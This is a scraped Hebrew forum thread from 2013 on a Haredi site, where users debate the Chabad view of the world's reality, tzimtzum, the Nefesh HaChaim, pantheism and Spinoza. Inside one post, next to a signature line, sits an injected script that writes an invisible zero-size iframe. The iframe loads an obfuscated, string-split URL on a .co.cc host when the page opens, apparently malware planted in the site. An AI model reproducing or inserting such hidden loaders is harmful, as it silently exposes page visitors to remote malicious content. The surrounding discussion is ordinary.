בית פורומים עצור כאן חושבים

מציאות העולם על פי שיטת חב"ד

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-7/4/2013 18:05 לינק ישיר 

ליאונרדו
ללא התעמקות הנמנעת ממני כעת, אולי נצטרך לחזור להגדרות של הרמב"ם על המצוי ההכרחי

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 18:05 לינק ישיר 

בעלבעמיו.
אבקשך שלכשתפנה תשנה לי בפירוט יתר.
כעת לא ירדתי לסוף דעתך הרחבה.  
עמך הסליחה.

תוקן על ידי דה_וינצי2 ב- 07/04/2013 18:10:25

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 18:17 לינק ישיר 

סליחה על העריכה הגרועה משום מה אין לי כלי עריכה, מישהו יודע לעזור? ---- מכיוון שבענין זה הנני לגמרי תלמיד של מו"ר הרב ראובן לויכטר, נוח לי לצטט מביאורו לנפה"ח שער ג' פרק ו' אולם אשמח לדון בדברים. הוא מתייחס לדבריו של הנפה"ח שהבחינה שמצידו היא 'ממלא' ומצידנו 'סובב':" מסקנת רבינו כאן שאין שום מקום לעבודה בבחי' שמצדו ית' וכל עבודתינו היא דווקא בקיום התורה ודקדוק המצוות שהם שייכים רק בבחינה שמצידנו היא תולדה מביאורו את עניין 'סובב כל עלמין' ו'ממלא כל עלמין' בשתי הפרקים הקודמים. ומן המפורסמותשדבדבריו אלו בא רבינו להוציא מדבריהם של גדולי החסידות שביארו סוגיה זו בצורה שונה ובאו על ידי זה לשינוי מהותי בכל דרכי העבודה. בספרי גדולי החסידות נתבאר עניין הממלא והסובב בצורה הפוכה מדברי רבינו. בחינת ממלא כל עלמין היא הבחינה שעל פיה הקב"ה ממלא את כל העולם ומחיה אותו כמילוי הנשמה את הגוף ואילו בחנת סוסס היא הבחינה שעל פיה הקב"ה סובב את כל העולם בהשוואה גמורה כעיגול המקיף שאין בו מעלה ומטה.שינוי זה אינו רק שינוי השם אלא הוא מלמד על שינוי מהותי בהבנת עניינה של הבחינה הנסתרת מאיתנו.בעל התניא מדגיש שלמרות הצמצום הוא ית' ממלא כל עלמין ואילו רבינו מבאר להיפך שאף שהוא ית' ממלא כל עלמין בהשוואה גמורה , אך מנפלאותי הוא שעניין זה נסתר מאיתנו . שינוי זה מוליד גם מחלוקת בדרכי העבודה"...[כאן כבר נמאס לי להעתיק ואכתוב שמה שהוא אומר בהמשך זה שמכאן נולד המושג ביטול היש, שכן לפי הבנת החסידות יש בתוך התחום של הנבראים מציאות שבה העולם בטל ואילו לנפה"ח זו רק אמונה שיש בחינה כזו אבל א"א להתעסק איתה כלל לשום נברא שהוא). -------- עד כאן דברי הרב. מכאן דברי התלמיד שמסכם את האמור ביחס לנידון אשכול זה. להבנתי כוונת הנפה"ח היא שכשם שכל ידיעתינו על הבורא היא על דרך השלילה כך כל ידיעתינו על מציאות העולם מצד הבורא היא שמצידו העולם לא שייך, וכיוון שבמושגים רוחניים עסקינן הרי שאם לא שייך אזי מצידו אין עולם, ומצידו הפירוש מצד מציאותו שהיא סוג מציאות אחרת, מציאות של בורא. דהיינו לא שיש בזה דרגות אלא שכך זה מצד ה'סוג' מציאות של בורא: שאין עוד מציאות.אבל כיוון שהוא מעל הנמנעות הרי שהוא יצר מציאות של עולם ושמה הוא רק בבחינת ממלא שמקיים את העולם. וכך כותב בפרק ו':" מצדו המשיג עצמותו", דהינו שזה שייך לאיך שהבורא משיג את עצומתו ומזה יוצא היחס לעולם. אבל לפי התניא הרי שגם האופן שבו העולם התאפשר הוא לא רק בזה שהבורא מעל הנמנעות, אלא שגם במציאות העולם יש דרגה נעלמת שבה כל המציאות מתייחסת לאין סופיות של הבורא וזה מה שמקיים אותה. לפי זה הנפה"ח כלל לא התחבט בפרדוכס כל שהו והיחס שלו לבריאה איך שהיא היום לא יהיה שונה מהיחס של כל ריאליסט. ולדעתו עניין הצמצום שייך רק לאמונה שיש דרגה מצד הבורא שאין עולם ועלינו להתעסק איתה באמונה רצוא ושוב. אמרי בינה מה המקור שהגר""א היה קיצוני יותר מהגר"ח בענין זה? דרך אגב בערך חב"ד בויקיפדיה יחסו של הגר"ח לחסידות מתואר בצורה מגוחכת, וביארתי דברי בדף שיחה שם . זה היחס הכללי בחב"ד? ------- וינצ'י: המחוץ לטבע הוא לדעתי זה שהוא סוג מציאות אחרת בעצם הגדרתה כנמצאת. ולא שהוא נמצא כמו שהמציאות נמצאת אלא שהוא רוחני לגמרי ואצלו המציאות היא אלוקית.

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 18:23 לינק ישיר 

בעיקר שומע כתב בסוף דבריו:
וינצ'י: המחוץ לטבע הוא לדעתי זה שהוא סוג מציאות אחרת בעצם הגדרתה כנמצאת. ולא שהוא נמצא כמו שהמציאות נמצאת אלא שהוא רוחני לגמרי ואצלו המציאות היא אלוקית.

א"כ מה בעיה אם הפנתיאזם? הוא לא אומר שאלוקים זה אבן. הוא אומר שכוליות של העולם היא אלוקים. כוליות אלוקית היא גם סוג אחר של מציאות. במציאות חומרית אין שום משמעות לכוליות. 

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 18:38 לינק ישיר 

הבעיה עם הפנתאיזם היא בעיקר דתית ולא בעצם תפיסתה הפילוסופית. כי אם אתה רואה את מציאותו של הבורא באותו מקום שבו המציאות נמצאת, זה מוריד מהתביעה המוחלטת של הבורא מהנבראים, כמצווה ומצווים. והחסידות עושה שילוב שהבורא נמצא איתנו ביחד בשביל העבודה 'החסידית' אבל... יש את הבחינה היותר שרשית ששם הוא נמצא לבד ולא שייך כלל מציאות. עקרונית היא יכלה להגיד שבשביל השו"ע הבורא נמצא כמו אצל הנפה"ח ובשביל החסידות וכו' אלא שהיא רואה עצמה כמפרשת את השו"ע. נראה לי שבברסלב ששם השו"ע נשמר כצורתו יש קצת את היחס הכפול הזה בצורתו שהצגתי בסוף, ולכן דיבורי החסידות שם הם רק ביחס לעבודה מעשית וליחס של הבורא אלינו.

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 18:49 לינק ישיר 

למה זה מוריד מהתביעה הדתית?

אם הפנתיאזם שולל נס וממילא הוא שולל גם התגלות. מובן למה ישנו כאן פיחות בצו הדתי עד כדי שלילתו. אבל גם את הטענה השיפנוזיסטית הזו אני לא כ"כ מבין. למה הנס נשלל? מה לא יתכן אלוקית טבעית שגורמת לשינויים טבעיים כדוגמת קריעת ים סוף ע"י שילוב של כוחות טבע ותיזמונם? [ע"ע ויליקובסקי]. 

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 19:27 לינק ישיר 

בעיקרשומע כתב:
... נראה לי שבברסלב ששם השו"ע נשמר כצורתו יש קצת את היחס הכפול הזה בצורתו שהצגתי בסוף, ולכן דיבורי החסידות שם הם רק ביחס לעבודה מעשית וליחס של הבורא אלינו.

www.etzion.org.il/vbm/archive/8-rnachman/07.rtf

דדווח על תוכן פוגעני

נשלח ב-7/4/2013 19:46 לינק ישיר 

מסכים עם כולכם - דה וינצי ובעיקר שומע, ב99%. המעט מן המעט שאיני רואה עימכם עין בעין הוא הוא השאור שבעיסה
הגורם לי לא לראות שום בעיה שהעלתם - קוהורנטית ואחרת בתפיסה הבעשטית.

רק שהדיון על 1% זה המכריע חייב לענ"ד להעשות פא"פ בדיאלוג קולח עד חידוד הנקודה לתמציתה. חוששני שכל נסיון לפתור קושיותכם בהתנסחות כאן תחטיא מלבטא.

הרוצה לראות בדברי התחמקות שיבוסם לו. אך כבר עד כה נאמרו דברים ולא הובנו אלא חזרו ודשו באשר כבר הובהר. מכירי המטריה כנראה יבינו, מודעים ורגילים הם כי זיקוק נקודות אבסטרקטיות משלב מסויים אינן ניתנות להכלה בכתב מונולוגי בצורה שהקורא יבחין בניואנס...כדקיי"ל  אין דורשין במעשה בראשית בשנים...

דדווח על תוכן פוגעני

נשלח ב-8/4/2013 21:04 לינק ישיר 

וואו. לאיתי היקר, אנסה להסביר כמיטב יכולתי.
 בחב"ד לא סבורים שהעולם הוא דמיון, אלא שהמציאות נקבעת על פי התורה, כלומר, אני יודעת שיש עולם כי כתוב בראשית ברא אלוקים וכו'. המקור לזה- אסתכל באורייתא וברא עלמא. בנוסף יש את העניין של התהוות תמידית, שהקב"ה מחיה את העולם ומהווה אותו בכל רגע מחדש- וזה לימוד על הפסוק "לעולם ה' דברך ניצב בשמים." שהאותיות יהי רקיע מהוות את הרקיע וכן הלאה כל עשרת המאמרות מהווים את העולם והאותיות של עשרה מאמרות הן כלים לחיות המהווה את הרקיע/ ארץ/ חי צומח וכו'. 
זה לא דמיון. זו פשוט אמונה שכל מה שיש כאן ולמעלה הוא אלוקות. 
מה שכתבת על מי זה בעצם אני- תלוי אם אתה צדיק או בינוני/ רשע. אצל הצדיקים יש רק נפש אלוקית כי הכריעו את הנפש הבהמית, וזוהי מציאותם, ולכן היה הלל אומר שהולך להאכיל את העלובה- זה גופו, שהיה מדבר עליו כעל מישהו זר. לעומת זאת רובנו מורכבים מאני שהוא נפש בהמית, שכל רצונותינו נובעים ממנה, ורק מעט מהרצון נובע מנפש האלוקית שבאה לידי ביטוי מעט מדי בחיינו (שוב, כל אחד לפי דרגתו). אז אם אתה שואל מי אני, אני הנפש הבהמית. או אולי בפורום הזה שייך לכתוב הנפש השכלית ולעיתים האלוקית כי הבהמה לא כל כך מתעניינת בשאלות כמו אלו המופיעות כאן.

למיימוני, אדמו"ר הזקן לא מפרק לחלקי חלקים את הנשמה. מה שאתה קורא יצר טוב הוא קורא נפש האלוקית, ולמה שאתה קורא יצר הרע- נפש הבהמית. החלוקה לספירות ומידות היא בסך הכל חלוקה של תכונות שקיימות גם בצד הקדושה וגם בצד הקליפה, כמו נטייה לחסד (בית הלל.) נטייה להחמרה (גבורה, בית שמאי), ועוד מידות שיכולות להתבטא בצורה טובה ובצורה רעה. המידות והמוחין זה לא "אני" אלא כלי דרכו אני מתבטאת, כלומר, נפשי האלוקית מתבטאת דרך מוחין דקדושה, לימוד תורה נניח, ונפשי הבהמית דרך כעס וגאווה או תכסיסים שכליים למטרות רעות חלילה.

דדווח על תוכן פוגעני

נשלח ב-8/4/2013 23:56 לינק ישיר 

מיימוני כתב:
מיכלתודה.אני רגיל, בכל תחום, לקרוא את המקור, ולהשתדל להבדיל בין הפירושים על דרך הפשט לבין הפירושים שמתווספים "מבחוץ" כדי "להציל" את הטקסט מבעיות שיש בו.אם יש לך הפניה למקום מסויים בפירוש שפותר את הבעיות האלו, או מציג את המקור שעליו דיברה אמאי, בשמחה אשתדל לבדוק. (יש לי בספריה כמה ספרים על התניא, החל בחלמיש וכלה בכרך א' אפילו של החסידות המבוארת על התניא. לא להאמין. כולם כמובן חבויים עמוק במקום שהילדים והשכנים לא יראו חלילה, סמיילי).

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תסביר למה אתה קורא "בעיות" לא הבנתי .

למה זה במסתור וחבוי, יש עדיין את החשש הזה שיראו אותכם לומדים חסידות? זה לא משהו שהיה דורות קודם לכן ונגמר?

דדווח על תוכן פוגעני

נשלח ב-8/4/2013 23:57 לינק ישיר 

Zeev_w כתב:
מיכל, סתם שאלה של סקרנות, מה הקטע בלהוסיף <770>לניקים וכדו' של חבד'ניקים'?

אין קטע , אין ציווי , זה לא מנהג , ואמת שזה יצא כ"כ טבעי שפשוט לא הנחתי את הראש למה עשיתי את זה
מס' קל , שעומד לי בראש , שבטח אזכור אותו ו..עוד כמה דברים 

דדווח על תוכן פוגעני

נשלח ב-9/4/2013 10:09 לינק ישיר 

דה_וינצי2 כתב:

אם הפנתיאזם שולל נס וממילא הוא שולל גם התגלות. מובן למה ישנו כאן פיחות בצו הדתי עד כדי שלילתו. אבל גם את הטענה השיפנוזיסטית הזו אני לא כ"כ מבין. למה הנס נשלל? מה לא יתכן אלוקית טבעית שגורמת לשינויים טבעיים כדוגמת קריעת ים סוף ע"י שילוב של כוחות טבע ותיזמונם? [ע"ע ויליקובסקי]. 
נס פירושו שיש תודעה ש<שמחוץ לעולם> והוא גובר על טבעו של עולם. וכן הפתיאזם חולק על אפשרות הנס. מחד, הוא אינו מכיר במה שחוץ לעולם. ובנוסף, העולם עצמו הוא אלוקי . מיכל תודה על תשובתך הכן. עניין אותי בעיקר הסוף "ו.. עוד כמה דברים" :)

דדווח על תוכן פוגעני

נשלח ב-9/4/2013 13:39 לינק ישיר 

דה_וינצי2 כתב:

לא דברתי על נס והתגלות, דברתי על יחס של ישות מצווה על מצטווה. וזה רק בזה שיש מציאות שהיא סוג מציאות אחר, שכל קיומו של הנברא הוא ברצונו, ואז ודאי שהוא מחוייב לחלוטין לרצונו. אלוקות טבעית איננה מחייבת מצוות בצורה זו אלא בצורה של סדר העולם עצמו, אבל אין זו צורת העבודה המונותאיסטית שהחיוב בוא לעשות רצונו. (בשלב שני גם בתורה יש תכלית למצוות בעולם אבל זו לא הצורה הדתית של היהדות)

דדווח על תוכן פוגעני

נשלח ב-9/4/2013 14:11 לינק ישיר 

א. לא אתה דברת על נס והתגלות. כי אם שפינוזה, תלמידיו ומבקריו.
ב. בענין יחס של מצוה ומצווה, ראשית אני אכן מסכים אתך שהצורה הדתית של היהדות ולדעתי הצורה של מצוה ומצווה בכלל אין להם שום עסק עם התכלית.
אבל אני עדיין לא מבין מה הבעיה? אני הרי כבר טענתי למעלה שגם בפנתאיזם לענ"ד ניתן למצוא מקום למציאות 'מסוג אחר' כמו שאתה קורא לזה. אותה מציאות אני יכול לקרוא לה הפן האחר של המציאות, או הפן הפנימי של המציאות. אותו פן נגלה או היה גלוי למשה. אתה יכול לקרוא לזה שהוא הבין את שורש המציאות. מכח הגילוי או ההבנה נגזרות תרי"ג מצוות\סגולות\ענינים\בעיות?
מה לא בסדר?

דדווח על תוכן פוגעני

נשלח ב-9/4/2013 14:33 לינק ישיר 

ובלשונו של מיכה גודמן בשם הרמב"ם:

"משה התבונן בטבע, הבין לעומק את חכמת אלוהים שבו ותרגם אותם לחוקים המעצבים חברה אידיאלית ובני אדם אידיאליים. לא אלהים כתב את הספר ...הוא אינו מדבר, אינו כותב ואינו מכתיב...משה רבנו התבונן בעולם וכתב את התורה...אלוהים ברא את הטבע ומשה הוא שכתב את התורה...לסיכום ניתן לומר כי אף על אף שאלוהים לא כתב את התורה, התורה אלוהית"

("סודותיו של מורה הנבוכים" עמ' 187)

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > מציאות העולם על פי שיטת חב"ד
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 6 לדף הבא סך הכל 6 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.